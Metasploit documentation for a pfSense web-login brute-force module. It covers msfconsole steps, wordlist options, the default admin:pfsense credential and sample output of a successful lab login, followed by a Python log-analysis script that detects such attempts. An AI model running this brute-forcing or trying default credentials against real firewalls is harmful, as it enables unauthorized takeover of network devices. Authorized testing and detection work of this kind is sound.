Pfsense Login

documentation/modules/auxiliary/scanner/http/pfsense_login.md


Vulnerable Application

This module attempts to bruteforce credentials for pfSense.

This module was specifically tested on version 2.7.2:

2.7.2 Download

https://atxfiles.netgate.com/mirror/downloads/

Note:

By default, pfSense ships with a built-in account named admin whose password is pfsense.

Verification Steps

  1. Set up a pfSense VM using the steps above or target a real installation
  2. Start msfconsole: bundle exec ./msfconsole -q
  3. use auxiliary/scanner/http/pfsense_login
  4. set ssl true
  5. set pass_file ...
  6. set user_file ...
  7. run
  8. or, using some example inline options: run pass_file=data/wordlists/default_pass_for_services_unhash.txt user_file=data/wordlists/default_pass_for_services_unhash.txt STOP_ON_SUCCESS=true SSL=true rport=443
  9. Verify you get a login:
[+] 192.168.207.158:443 - Login Successful: admin:pfsense

Options

BLANK_PASSWORDS

Set to true if an additional login attempt should be made with an empty password for every user.

BRUTEFORCE_SPEED

How fast to bruteforce, from 0 to 5

PASSWORD

A specific password to authenticate with

PASS_FILE

File containing passwords, one per line

STOP_ON_SUCCESS

Stop guessing when a credential works for a host

THREADS

The number of concurrent threads (max one per host)

USERPASS_FILE

File containing users and passwords separated by space, one pair per line

USER_FILE

File containing usernames, one per line

VERBOSE

Whether to print output for all attempts

Scenarios

msf auxiliary(scanner/http/pfsense_login) > options

Module options (auxiliary/scanner/http/pfsense_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   PASSWORD          pfsense          no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.207.158  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             443              yes       The target port (TCP)
   SSL               true             no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   TARGETURI         /                yes       The base path to the pfSense application
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          admin            no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf auxiliary(scanner/http/pfsense_login) > run
[+] 192.168.207.158:443 - Login Successful: admin:pfsense
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
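
On the pfSense side, a run like the one above appears as a burst of failed webConfigurator logins from one source address, possibly ending in a successful login. The following is an added detection example, not part of the Metasploit module or its documentation; the log message wording, the function name find_bruteforce and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed wording of pfSense webConfigurator auth events in the system log;
# adjust both patterns to match what your pfSense version actually emits.
FAIL_RE = re.compile(r"webConfigurator authentication error for user '([^']*)' from: (\S+)")
OK_RE = re.compile(r"Successful login for user '([^']*)' from: (\S+)")

def find_bruteforce(lines, threshold=3):
    """Return one finding per source IP with at least `threshold` failed logins.

    Each finding lists the usernames tried and any account that logged in
    from that source after its failures began (a likely guessed credential).
    """
    failures = defaultdict(list)    # source IP -> usernames that failed
    guessed = defaultdict(set)      # source IP -> users with a success after failures
    for line in lines:
        m = FAIL_RE.search(line)
        if m:
            failures[m.group(2)].append(m.group(1))
            continue
        m = OK_RE.search(line)
        # Only a success that follows failures from the same source is suspicious.
        if m and failures.get(m.group(2)):
            guessed[m.group(2)].add(m.group(1))
    return [
        {"src": src, "failed": len(users), "users_tried": sorted(set(users)),
         "success_after_failures": sorted(guessed[src])}
        for src, users in sorted(failures.items()) if len(users) >= threshold
    ]

# Constructed sample log lines (not captured from a real system).
SAMPLE_LOG = """\
Jan 10 09:14:01 fw php-fpm[411]: /index.php: webConfigurator authentication error for user 'admin' from: 192.0.2.50
Jan 10 09:14:02 fw php-fpm[411]: /index.php: webConfigurator authentication error for user 'root' from: 192.0.2.50
Jan 10 09:14:03 fw php-fpm[411]: /index.php: webConfigurator authentication error for user 'admin' from: 192.0.2.50
Jan 10 09:14:04 fw php-fpm[411]: /index.php: Successful login for user 'admin' from: 192.0.2.50 (Local Database)
Jan 10 09:20:11 fw php-fpm[412]: /index.php: webConfigurator authentication error for user 'alice' from: 198.51.100.7
Jan 10 09:20:30 fw php-fpm[412]: /index.php: Successful login for user 'alice' from: 198.51.100.7 (Local Database)
Jan 10 10:02:45 fw php-fpm[413]: /index.php: Successful login for user 'admin' from: 203.0.113.9 (Local Database)
"""

if __name__ == "__main__":
    for finding in find_bruteforce(SAMPLE_LOG.splitlines()):
        print(finding)
```

A finding with a non-empty success_after_failures list means the credential should be rotated; a default admin password left unchanged will be guessed on the first attempts and may never reach the failure threshold, so it needs to be changed at install time rather than detected.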